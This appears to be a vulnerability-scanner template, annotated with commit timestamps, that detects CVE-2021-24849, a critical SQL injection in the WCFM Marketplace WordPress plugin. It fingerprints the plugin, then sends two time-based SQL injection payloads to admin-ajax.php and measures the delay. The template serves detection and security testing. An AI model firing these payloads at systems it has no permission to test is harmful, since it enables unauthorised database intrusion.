2024-02-13 04:02:40 +00:00
id : CVE-2021-24849
info :
name : WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
author : ritikchaddha
severity : critical
description : |
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
2024-03-23 09:28:19 +00:00
remediation : Fixed in 3.4.12
2024-02-13 04:02:40 +00:00
reference :
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
2024-02-13 05:14:17 +00:00
- https://wordpress.org/plugins/wc-multivendor-marketplace/
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2021-24849
cwe-id : CWE-89
2024-03-23 09:28:19 +00:00
epss-score : 0.02367
2024-04-08 11:30:07 +00:00
epss-percentile : 0.89609
2024-03-04 08:20:22 +00:00
cpe : cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
2024-02-13 04:02:40 +00:00
metadata :
2024-03-04 08:20:22 +00:00
verified : true
max-request : 3
vendor : wclovers
2024-03-23 09:28:19 +00:00
product : "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
framework : wordpress
publicwww-query : "/wp-content/plugins/wc-multivendor-marketplace"
2024-04-08 11:30:07 +00:00
tags : wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers
2024-02-13 05:14:17 +00:00
flow : http(1) && http(2)
2024-02-13 04:02:40 +00:00
http :
- raw :
- |
GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
Host : {{Hostname}}
2024-02-13 05:14:17 +00:00
matchers :
- type : dsl
dsl :
- status_code == 200
- contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
condition : and
internal : true
- raw :
2024-02-13 04:02:40 +00:00
- |
@timeout : 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
{{post_data}}
payloads :
post_data :
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
stop-at-first-match : true
matchers :
- type : dsl
dsl :
2024-02-13 05:14:17 +00:00
- 'duration>=5'
2024-02-13 04:02:40 +00:00
- 'status_code == 200'
2024-02-13 05:14:17 +00:00
- 'contains(header, "application/json")'
- 'contains(body, "success")'
2024-02-13 04:02:40 +00:00
condition : and
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100ade9023a98f1e582ced87da228df4387a9351ee1bc7d0f80b959b1c01efe9301022100a724a4b3f7b0d2716fa368d0014ba7c027ba80d657109e06ec9571050764a3e9:922c64590222798bb761d5b6d8e72950